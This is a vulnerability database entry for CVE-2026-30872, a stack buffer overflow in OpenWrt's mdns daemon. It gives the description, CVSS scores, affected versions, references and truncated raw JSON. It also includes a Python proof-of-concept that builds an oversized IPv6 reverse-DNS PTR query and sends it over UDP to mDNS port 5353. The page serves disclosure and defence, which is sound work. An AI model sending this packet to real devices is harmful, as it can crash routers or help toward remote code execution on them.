CVE-2026-30872

Description

OpenWrt Project is a Linux operating system targeting embedded devices. In versions prior to 24.10.6 and 25.12.1, the mdns daemon has a Stack-based Buffer Overflow vulnerability in the match_ipv6_addresses function, triggered when processing PTR queries for IPv6 reverse DNS domains (.ip6.arpa) received via multicast DNS on UDP port 5353. During processing, the domain name from name_buffer is copied via strcpy into a fixed 256-byte stack buffer, and then the reverse IPv6 request is extracted into a buffer of only 46 bytes (INET6_ADDRSTRLEN). Because the length of the data is never validated before this extraction, an attacker can supply input larger than 46 bytes, causing an out-of-bounds write. This allows a specially crafted DNS query to overflow the stack buffer in match_ipv6_addresses, potentially enabling remote code execution. This issue has been fixed in versions 24.10.6 and 25.12.1.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:openwrt:openwrt:*:*:*:*:*:*:*:* - VULNERABLE

OpenWrt Project < 24.10.6

OpenWrt Project < 25.12.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# PoC for CVE-2026-30872
# Sends a crafted mDNS PTR query to trigger buffer overflow in OpenWrt mdns

def send_exploit(target_ip, target_port):
    # DNS Header: Transaction ID=0, Flags=0 (Standard query), Questions=1
    header = b'\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00'

    # Malicious Query Name (PTR)
    # Constructing a long .ip6.arpa query to exceed the 46-byte buffer
    # Format: [len][label].[len][label]...ip6.arpa
    # We create a long sequence of hex nibbles to trigger the overflow
    overflow_len = 100  # Long enough to exceed 46 bytes
    
    # Building the QNAME part (simplified representation of a long IPv6 reverse)
    # Each '1' represents a hex nibble in the reverse address
    qname_parts = [b'\x01' + b'1' for _ in range(overflow_len)]
    qname = b''.join(qname_parts) + b'\x03ip6\x04arpa\x00'

    # Question Type: PTR (12), Class: IN (1)
    qtail = b'\x00\x0c\x00\x01'

    packet = header + qname + qtail

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(packet, (target_ip, target_port))
        print(f"[+] Exploit packet sent to {target_ip}:{target_port}")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    # Target mDNS multicast address or specific device IP
    target = "224.0.0.251"
    port = 5353
    send_exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30872
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30872
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30872/
[4] VulDB https://vuldb.com/cve/CVE-2026-30872
[5] https://github.com/openwrt/openwrt/releases/tag/v24.10.6
[6] https://github.com/openwrt/openwrt/releases/tag/v25.12.1
[7] https://github.com/openwrt/openwrt/security/advisories/GHSA-mpgh-v658-jqv5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30872", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:31.797", "lastModified": "2026-03-24T14:05:07.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenWrt Project is a Linux operating system targeting embedded devices. In versions prior to 24.10.6 and 25.12.1, the mdns daemon has a Stack-based Buffer Overflow vulnerability in the match_ipv6_addresses function, triggered when processing PTR queries for IPv6 reverse DNS domains (.ip6.arpa) received via multicast DNS on UDP port 5353. During processing, the domain name from name_buffer is copied via strcpy into a fixed 256-byte stack buffer, and then the reverse IPv6 request is extracted into a buffer of only 46 bytes (INET6_ADDRSTRLEN). Because the length of the data is never validated before this extraction, an attacker can supply input larger than 46 bytes, causing an out-of-bounds write. This allows a specially crafted DNS query to overflow the stack buffer in match_ipv6_addresses, potentially enabling remote code execution. This issue has been fixed in versions 24.10.6 and 25.12.1."}, {"lang": "es", "value": "Proyecto OpenWrt es un sistema operativo Linux dirigido a dispositivos embebidos. En versiones anteriores a la 24.10.6 y 25.12.1, el demonio mdns tiene una vulnerabilidad de desbordamiento de búfer basado en pila en la función match_ipv6_addresses, que se activa al procesar consultas PTR para dominios DNS inversos IPv6 (.ip6.arpa) recibidas a través de DNS multicast en el puerto UDP 5353. Durante el procesamiento, el nombre de dominio de name_buffer se copia mediante strcpy en un búfer de pila fijo de 256 bytes, y luego la solicitud IPv6 inversa se extrae en un búfer de solo 46 bytes (INET6_ADDRSTRLEN). Debido a que la longitud de los datos nunca se valida antes de esta extracción, un atacante puede proporcionar una entrada mayor de 46 bytes, causando una escritura fuera de límites. Esto permite que una consulta DNS especialmente diseñada desborde el búfer de pila en match_ipv6_addresses, lo que podría permitir la ejecución remota de código. Este problema ha sido corregido en las versiones 24.10.6 y 25.12.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.5, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.10.6", "matchCriteriaId": "12B5818C-BB4D-4486-9C53-7FCA8EF2EDA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:*:*:*:*:*:*:*:*", "versionStartIncluding": "25.12.0", "versionEndExcluding": "25.12.1", "matchCriteriaId": "061FA3CA-10C0-4EF2-8566-E623964CAE79"}]}]}], "references": [{"url": "https://github.com/openwrt/openwrt/releases/tag/v24.10.6", "source": "[email protected]", "tags": ["Re ... (truncated)